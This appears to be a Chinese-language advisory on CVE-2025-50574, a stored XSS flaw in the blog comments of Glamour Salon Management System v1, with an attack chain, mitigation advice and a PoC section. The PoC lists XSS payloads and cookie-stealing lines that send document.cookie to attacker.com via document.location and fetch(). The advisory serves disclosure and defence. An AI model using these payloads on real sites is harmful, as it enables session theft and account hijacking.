CVE-2025-50574 Glamour Salon Management System v1 博客评论存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-50574

漏洞类型

XSS跨站脚本攻击

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Glamour Salon Management System v1

漏洞概述

CVE-2025-50574是Hiruna Gallage开发的Glamour Salon Management System v1中存在的存储型跨站脚本（Stored XSS）漏洞。该漏洞位于blog-details.php文件中的博客评论功能模块，攻击者可以通过评论部分参数注入任意Web脚本或HTML代码。由于该漏洞为存储型XSS，恶意脚本会被永久保存在服务器端，所有访问该博客页面的用户都会受到攻击影响。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或植入恶意重定向，对系统用户造成严重安全威胁。此漏洞无需认证即可利用，但需要用户交互才能触发，因此CVSS评分为6.1，属于中等严重程度。攻击向量为网络，复杂度低，无需特殊权限，但需要受害者访问包含恶意脚本的页面才能完成攻击。

技术细节

该漏洞本质上是典型的存储型XSS（Stored Cross-Site Scripting）漏洞。在Glamour Salon Management System的blog-details.php文件中，博客评论功能未对用户输入进行充分的输入验证和输出编码。当用户提交包含恶意JavaScript代码的评论时，系统直接将该内容存储到数据库中而未进行安全过滤。随后，当其他用户访问该博客详情页面时，服务器从数据库中检索并展示评论内容，如果评论中包含恶意脚本，这些脚本会在受害者的浏览器中执行。攻击者可以利用此漏洞注入窃取Cookie的JavaScript代码，如：<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>。由于浏览器同源策略的限制，攻击者通常无法直接获取HttpOnly标记的Cookie，但可以利用XSS漏洞进行其他恶意操作，如键盘记录、页面篡改或发起进一步的攻击。修复此类漏洞需要对所有用户输入进行严格的输入验证，并使用HTML实体编码或使用现代前端框架的安全机制进行输出编码。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的博客详情页面（blog-details.php），识别评论功能模块

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的评论内容，如<script>alert(document.cookie)</script>

STEP 3

步骤3

攻击者提交恶意评论，系统未进行输入验证直接将评论内容存入数据库

STEP 4

步骤4

其他用户访问同一博客详情页面，服务器从数据库读取并展示包含恶意脚本的评论

STEP 5

步骤5

受害者浏览器解析页面时执行恶意脚本，攻击者成功窃取Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-50574 PoC - Stored XSS in Glamour Salon Management System -->
<!-- Target: blog-details.php comment section -->
<!-- Steps: -->
<!-- 1. Navigate to blog-details.php -->
<!-- 2. Find the comment form -->
<!-- 3. Submit the following payload in the comment field -->

<!-- Basic XSS Payload -->
<script>alert('XSS')</script>

<!-- Cookie Stealing Payload -->
<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>

<!-- Image Tag XSS (bypass some filters) -->
<img src=x onerror=alert(document.cookie)>

<!-- SVG XSS Payload -->
<svg/onload=alert('XSS')>

<!-- Event Handler XSS -->
<body onload=alert('XSS')>

<!-- Example HTTP Request -->
POST /blog-details.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

comment=<script>fetch('https://attacker.com/log?c='+document.cookie)</script>&submit=Submit

影响范围

Glamour Salon Management System v1.0

防御指南

临时缓解措施

在生产环境中，可临时禁用博客评论功能以避免攻击风险。同时，可在Web应用防火墙（WAF）层面添加XSS过滤规则，对包含<script>、javascript:等关键字的请求进行拦截。建议在服务器端对所有用户输入实施严格的输入验证，并使用HTML编码函数对输出内容进行处理。考虑部署ModSecurity等WAF产品提供实时的XSS攻击防护。